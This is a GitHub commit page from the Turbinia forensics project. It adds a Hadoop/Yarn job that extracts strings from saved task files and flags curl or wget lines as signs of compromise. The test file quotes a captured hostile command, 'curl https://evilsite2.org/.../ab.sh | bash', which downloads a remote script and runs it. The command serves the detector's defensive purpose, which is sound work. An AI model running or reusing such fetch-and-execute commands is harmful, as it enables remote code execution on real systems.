Permalink
Browse files

Hadoop (Yarn tasks) compromise analysis (#243)

* empty shell

* more scaffholding

* make all of this more simple

* Things appear to be working

* typo

* undo some filepath manipulations

* register the new hadoop Job

* cleanup

* renamed

* fix output evidence

* add tests

* typo

* styleguide

* full path to strings

* comments

* sync

* fix tests

* fix py3 tests

* fix py3 harder

* I call this 'bruteforce programming'

* Make _AnalyzeHadoopAppRoot return a list of string, to use the first one as status on the result Evidence

* remove extra tab

* also check at the beggining of the line
  • Loading branch information...
rgayon authored and aarontp committed Sep 19, 2018
1 parent d401f52 commit 6f031ea05f3bb9ab573c76c0107c5ca10830aa6b
Binary file not shown.
View
@@ -24,13 +24,14 @@ def get_jobs():
A list of TurbiniaJobs.
"""
# Defer imports to prevent circular dependencies during init.
from turbinia.jobs.grep import GrepJob
from turbinia.jobs.hadoop import HadoopAnalysisJob
from turbinia.jobs.plaso import PlasoJob
from turbinia.jobs.psort import PsortJob
from turbinia.jobs.grep import GrepJob
from turbinia.jobs.worker_stat import StatJob
from turbinia.jobs.strings import StringsJob
from turbinia.jobs.sshd import SSHDExtractionJob
from turbinia.jobs.sshd import SSHDAnalysisJob
from turbinia.jobs.strings import StringsJob
from turbinia.jobs.worker_stat import StatJob
from turbinia.jobs.tomcat import TomcatExtractionJob
from turbinia.jobs.tomcat import TomcatAnalysisJob
from turbinia.jobs.analysis.http_access_logs import HTTPAccessLogExtractionJob
@@ -39,10 +40,10 @@ def get_jobs():
# TODO(aarontp): Dynamically look up job objects and make enabling/disabling
# configurable through config and/or recipes.
return [
StatJob(), PlasoJob(), PsortJob(), StringsJob(), GrepJob(),
SSHDExtractionJob(), SSHDAnalysisJob(), HTTPAccessLogExtractionJob(),
HTTPAccessLogAnalysisJob(), TomcatExtractionJob(), TomcatAnalysisJob(),
JenkinsAnalysisJob()]
GrepJob(), HadoopAnalysisJob(), HTTPAccessLogAnalysisJob(),
HTTPAccessLogExtractionJob(), JenkinsAnalysisJob(), PlasoJob(),
PsortJob(), SSHDExtractionJob(), SSHDAnalysisJob(), StatJob(),
StringsJob(), TomcatAnalysisJob(), TomcatExtractionJob()]
class TurbiniaJob(object):
View
@@ -0,0 +1,47 @@
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Job to execute Hadoop task."""
from __future__ import unicode_literals
from turbinia.evidence import GoogleCloudDisk
from turbinia.evidence import GoogleCloudDiskRawEmbedded
from turbinia.evidence import RawDisk
from turbinia.evidence import ReportText
from turbinia.jobs import TurbiniaJob
from turbinia.workers.hadoop import HadoopAnalysisTask
class HadoopAnalysisJob(TurbiniaJob):
"""Analyzes Hadoop AppRoot files."""
# The types of evidence that this Job will process
evidence_input = [GoogleCloudDisk, GoogleCloudDiskRawEmbedded, RawDisk]
evidence_output = [ReportText]
def __init__(self):
super(HadoopAnalysisJob, self).__init__(name='HadoopAnalysisJob')
def create_tasks(self, evidence):
"""Create task.
Args:
evidence: List of evidence object to process
Returns:
A list of tasks to schedule.
"""
tasks = [HadoopAnalysisTask() for _ in evidence]
return tasks
View
@@ -0,0 +1,121 @@
# -*- coding: utf-8 -*-
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Task to analyse Hadoop AppRoot files."""
from __future__ import unicode_literals
import codecs
import os
import subprocess
from turbinia import TurbiniaException
from turbinia.evidence import ReportText
from turbinia.lib.utils import extract_artifacts
from turbinia.workers import TurbiniaTask
class HadoopAnalysisTask(TurbiniaTask):
"""Task to analyse Hadoop AppRoot files."""
def _AnalyzeHadoopAppRoot(self, collected_artifacts):
"""Runs a naive AppRoot files parsing method.
This extracts strings from the saved task file, and searches for usual
post-compromise suspicious patterns.
TODO: properly parse the Proto. Some documentation can be found over there:
https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto
Args:
collected_artifacts(list(str)): a list of paths to extracted files
Returns:
list(str): the result report, as a list of lines.
"""
report = []
strings_report = []
evil_commands = []
for filepath in collected_artifacts:
strings_report.append('Strings for {0:s}:'.format(filepath))
proc = subprocess.Popen(
'strings -a "{0:s}"'.format(filepath), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
strings_output, _ = proc.communicate()
strings_output = codecs.decode(strings_output, 'utf-8')
strings_report.append(strings_output)
for line in strings_output.splitlines():
if (line.find('curl') >= 0) or (line.find('wget') >= 0):
evil_commands.append((filepath, line))
if evil_commands:
report.append('Found suspicious commands!')
else:
report.append('Did not find any suspicious commands.')
for filepath, command in evil_commands:
report.append('File: {0:s}'.format(filepath))
report.append('Command: "{0:s}"'.format(command))
report.append('')
report.append('All strings from Yarn Tasks:')
report.extend(strings_report)
return report
def run(self, evidence, result):
"""Run Hadoop specific analysis on the evidences.
Args:
evidence (Evidence object): The evidence we will process
result (TurbiniaTaskResult): The object to place task results into.
Returns:
TurbiniaTaskResult object.
"""
# What type of evidence we should output.
output_evidence = ReportText()
# Where to store the resulting output file.
output_file_name = 'hadoop_analysis.txt'
output_file_path = os.path.join(self.output_dir, output_file_name)
output_evidence.local_path = output_file_path
try:
# We don't use FileArtifactExtractionTask as it export one evidence per
# file extracted
collected_artifacts = extract_artifacts(
artifact_names=['HadoopAppRoot'],
disk_path=evidence.local_path,
output_dir=os.path.join(self.output_dir, 'artifacts')
)
text_report_lines = self._AnalyzeHadoopAppRoot(collected_artifacts)
if not text_report_lines:
raise TurbiniaException(
'Report generated by _AnalyzeHadoopAppRoot() is empty')
output_evidence.text_data = '\n'.join(text_report_lines)
# Write the report to the output file.
with open(output_file_path, 'w') as fh:
fh.write(output_evidence.text_data.encode('utf8'))
fh.write('\n'.encode('utf8'))
result.add_evidence(output_evidence, evidence.config)
result.close(self, success=True, status=text_report_lines[0])
except TurbiniaException as e:
result.close(self, success=False, status=str(e))
return result
return result
@@ -0,0 +1,63 @@
# -*- coding: utf-8 -*-
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for hadoop."""
from __future__ import unicode_literals
import os
import unittest
from turbinia import config
from turbinia.workers import hadoop
class HadoopAnalysisTest(unittest.TestCase):
"""Tests for HadoopAnalysisTask."""
_EXPECTED_REPORT = """Found suspicious commands!
File: /../../test_data/bad_yarn_saved_task
Command: "1533561022643*Bcurl https://evilsite2.org/aldnalezi/mygit/raw/master/ab.sh | bash0"
All strings from Yarn Tasks:
Strings for /../../test_data/bad_yarn_saved_task:
hadoop
default"
EHDTS
YARN_AM_RM_TOKEN
APPLICATION_WEB_PROXY_BASE
%/proxy/application_1526380001485_0125"
MAX_APP_ATTEMPTS
APP_SUBMIT_TIME_ENV
1533561022643*Bcurl https://evilsite2.org/aldnalezi/mygit/raw/master/ab.sh | bash0
YARNX
dr.who
,(\x092
Application application_1526380001485_0125 failed 2 times due to AM Container for appattempt_1526380001485_0125_000002 exited with exitCode: 0
Failing this attempt.Diagnostics: For more detailed output, check the application tracking page: http://apelcycluster-m:8088/cluster/app/application_1526380001485_0125 Then click on links to logs of each attempt.
. Failing the application.8
"""
def setUp(self):
self.filedir = os.path.dirname(os.path.realpath(__file__))
self.test_file = os.path.join(
self.filedir, '..', '..', 'test_data', 'bad_yarn_saved_task')
def testAnalyzeHadoopAppRoot(self):
"""Tests the _AnalyzeHadoopAppRoot method."""
config.LoadConfig()
task = hadoop.HadoopAnalysisTask()
self.maxDiff = None
report = '\n'.join(task._AnalyzeHadoopAppRoot([self.test_file]))
self.assertEqual(report.replace(self.filedir, ''), self._EXPECTED_REPORT)

0 comments on commit 6f031ea

Please sign in to comment.